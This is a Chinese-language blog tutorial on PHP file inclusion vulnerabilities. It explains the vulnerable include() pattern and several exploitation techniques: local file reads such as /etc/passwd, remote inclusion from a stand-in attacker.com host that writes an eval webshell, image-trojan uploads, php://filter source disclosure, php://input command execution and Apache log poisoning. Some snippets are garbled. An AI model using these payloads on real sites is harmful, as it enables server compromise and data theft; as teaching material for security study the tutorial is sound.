2. 程式人生 > >文件包含漏洞

文件包含漏洞

阿新 發佈:2018-04-24
use att read font 加載 文件的 根目錄 暴露 提交數據

在通過PHP的函數引入文件時,由於傳入的文件名沒有經過合理的校驗,從而操作了預想之外的文件,導致意外的文件泄露甚至惡意的代碼註入。

HP常見的導致文件包含的函數如下:include(),include_once(),require(),require_once(),fopen(),readfile()
使用前4個函數包含一個新的文件時,只要文件內容符合PHP語法規範,那麽任何擴展名都可以被PHP解析。包含非PHP語法規範源文件時,將會暴露其源代碼。

要想成功利用文件包含漏洞,需要滿足下面兩個條件:
1.include()等函數通過動態變量的方式引入需要包含的文件。
2.用戶能夠控制該動態變量

二、遠程文件包含
如果PHP的配置選項allow_url_include為ON的話,則include/require函數是可以加載遠程文件的,這種漏洞被稱為遠程文件包含漏洞。

三、本地文件包含的利用技巧

1.讀取敏感文件
訪問URL:http://www.xxser.com/index.php?page=/etc/passwd
如果目標主機文件存在,並且有相應的權限,那麽就可以讀出文件的內容。反之,就會得到一個類似於;open_basedir restriction in effect的警告。
2.遠程包含Shell
如果目標主機allow_url_fopen選項是激活的,就可以嘗試遠程包含一句話木馬,如:http://www.attacker.com/echo.txt,代碼如下:
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>
訪問:http://www.example.com/index.php?page=http://www.attacker.com/echo.txt。將會在index.php所在的目錄下生成shell.php,內容為:
<?php eval($_POST[xxser]);?>
3.本地包含配合文件上傳
假設已經上傳一句話圖片木馬到服務器,路徑為:/uploadfile/xxx.jpg
圖片代碼如下:<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>
訪問URL:http://www.example.com/index.php?page=./uploadfile/xxx.jpg,包含這張圖片,將會在index.php所在的目錄下生成shell.php。
4.使用PHP封裝協議
4.1 使用封裝協議讀取PHP文件
例子如下:http://www.example.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php
訪問URL,得到經過Base64加密後的字符串,這段代碼就是Base64加密過後的PHP源代碼,解密後就可得到原本的“樣貌”。
4.2 寫入PHP文件
在allow_url_include為On時,構造URL:http://www.example.com/index.php?page=php://input,並且提交數據為:<?php system(‘net user‘);?>
會得到net user命令的結果。
5.包含Apache日誌文件
本地文件包含的利用。
Apache有兩個日誌文件:access.log(訪問日誌)和error.log(錯誤日誌)。
攻擊者先訪問http://www.example.com/<?php phpinfo();?>,操作這一步時,需要Burp,否則<,>,空格都會被轉碼。
隨後訪問http://www.xxser.com/index.php?page=./../Apache-20/logs/access.log
使用這種方式時,找到Apache的路徑是關鍵。

圖片木馬一般不會被web殺毒軟件查出來。

一句話木馬
<?php eval()$_post[1]; ?>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
include "$_GET[pate]";
<?php
echo ‘<meta http-equiv="Content-Type" content="text/html;charset=utf8"/>‘;

include "$_GET[page]";
?>

新建 1.php文件 把一句話木馬寫進去 ,把文件放入網站的根目錄 用?page= 111.txt 運行


http://127.0.0.1/11.php?page=ee.txt

php語言 問號後面表示變量
$a =$_get[‘page‘];

$a ="$_get[page]";
include $a;
<?php phpinfo();?>顯示配置信息

條件 php.ini文件中有 allow_url_include=on

a="加密密碼"
for i in a:
print(chr(ord(i)+幾),end=‘‘)

http://10.1.2.5:17857/cs/main.php?page=php://filter/read=convert.base64-encode/resource=main.php

文件包含漏洞

相關推薦

【代碼審計】VAuditDemo 包含漏洞

http code 頭像 col 函數 文件名 中一 判斷 包含漏洞 在 index.php中先判斷get過來的module是否設置了變量,如果已經設置,則包含module,並與字符串.inc拼接 inc格式一般是圖標或者頭像格式,因此我們可以初步判斷,這個包含應該是基於

web實戰之包含漏洞小嘗試

web安全本文出自 “大李子” 博客,謝絕轉載!web實戰之文件包含漏洞小嘗試

PHP:包含漏洞

data adf 校驗和 all php版本 req 服務器文件 常用 man 簡單記錄一些文件包含漏洞的常用方法 產生原因: 文件包含漏洞的產生原因是在通過引入文件時,由於傳入的文件名沒有經過合理的校驗,或者校檢被繞過,從而操作了預想之外的文件,就可能導致意外的文件泄露甚

包含漏洞

use att read font 加載 文件的 根目錄 暴露 提交數據 在通過PHP的函數引入文件時,由於傳入的文件名沒有經過合理的校驗,從而操作了預想之外的文件,導致意外的文件泄露甚至惡意的代碼註入。 HP常見的導致文件包含的函數如下:include(),include

包含漏洞進階篇

com http base64編碼 style 本地文件 遠程 存在 size 宋體 前言: 文件包含漏洞雖然在前面已經說過,但是感覺還不到火候。這次在度 深入了解。 目錄: 本地文件包含漏洞的進階 遠程文件包含漏洞 正文: 進入之後選擇文件包含漏洞,如下圖

python打造包含漏洞檢測工具

毒藥 warning UNC plain con int www base64 ble 0x00前言: 做Hack the box的題。感覺那個平臺得開個VIp 不然得涼。一天只能重置一次。。。mmp 做的那題毒藥是文件包含漏洞的題,涉及到了某個工具 看的不錯就開發

包含漏洞總結

shell. github 引用 常見 logs zip 協議 ria etc 前言: 本人(九世)正式從博客園:遷移到:http://hackhat.net。會進行同步更新 正文: 漏洞來源: 文件包含漏洞,得從文件包含說起。一般寫代碼的人都知道,完成一個項目

php包含漏洞(利用phpinfo)復現

.com shell 發送數據包 上下文 ade lob 刪除 緩沖 com 利用docker復現該漏洞,訪問http://192.168.80.156:8080/phpinfo.php,可以看到頁面出現phpinfo頁面 再訪問http://192.168.80.

包含-筆記

本地文件 dsv 區別 eww output php ads -a 系統 以PHP為例 就可以使用 include require 來進行文件包含操作。目的是引用其他的文件、代碼。 當文件包含函數的參數用戶可控是可以引用惡意代碼。 DVWA_1.9此漏洞模塊

POI以SAX方式解析Excel2007大(包含空單元格的處理) Java生成CSV實例詳解

arraylist api csdn false gif pac apache all top http://blog.csdn.net/l081307114/article/details/46009015 http://www.cnblogs.com/dreammyl

shell--11、Shell 包含

shell 文件包含 和其他語言一樣,Shell 也可以包含外部腳本。這樣可以很方便的封裝一些公用的代碼作為一個獨立的文件。Shell 文件包含的語法格式如下:. filename # 註意點號(.)和文件名中間有一空格 或 source filename實例創建兩個 shell 腳本文件。tes

解析漏洞匯總

host tro apach handle nat 文件合並 常用 com href 解析漏洞正如其名,一般大家常說的是,文件在某種格式下,會被執行為該腳本語言的文件。 文件上傳漏洞通常與Web容器的解析漏洞配合利用 常見Web容器有IIS、Nginx、Apache、To

monxin cms 任意刪除漏洞

str date 發現 漏洞 conf cti 問題 var_dump ray \program\diypage\receive\edit.php首先看到一個unlink($path);本來應該先看sql語句的,但知道是任意文件刪除先跳過刪除語句,看看$path怎麽傳入的倒

Shell包含

sci chm bash 可執行 logs bin 執行權限 science light 創建兩個 shell 腳本文件。 test1.sh 代碼如下: #!/bin/bash url="http://www.cnblogs.com/freescience"

淺談本地包含利用

文件包含 lfishell nc反向連接 今天在公眾號看到了一個本地文件包含的利用工具,看了下國外大牛對該工具的使用的一個視頻,感覺很厲害,通過該工具可對存在本地文件包含漏洞的站點進行利用並返回一個LFI shell,通過返回的LFI shell再次獲取一個反向連接,從而可執行相關命令,以前對本地

WDK開發中的頭包含關系

ddk blog 組織 logs 技術分享 image es2017 msdn 層次 轉載自: http://www.cnblogs.com/bugchecker/archive/2012/10/26/3041591.html http://msdn.microsoft.c

查看靜態庫.a包含的內容

atom file dir dict dump tab drive tro view 查看靜態庫.a文件包含的內容用下面的命令解壓: [plain] view plain copy print? ar x libgdal.a 然

stm8 stvd工程頭包含方式

mage images 技術 窗口 rec 文件包含 tin log nbsp 方式一:在Include Files上右鍵 add files to folder把.h文件添加到該組下, 添加完編譯成功之後,下面窗口會多出一個預處理包含路徑(若有錯誤沒有編譯成功,則看不

feifeicms 3.2_.170306包含

eva 1-1 code info 重新編譯 pri ges blog image 文件包含 Lib\Lib\Action\Home/MyAction.class.php <?php class MyAction extends HomeAction{ pu

Discuz!X 3.4 任意刪除漏洞復現過程(附python腳本)

文件刪除 def aaa dal -1 headers bug send auth   今天看下群裏在討論Discuz!X 3.4 任意文件刪除漏洞,自己做了一些測試,記錄一下過程。結尾附上自己編寫的python腳本,自動化實現任意文件刪除。 具體漏洞,請查看 https: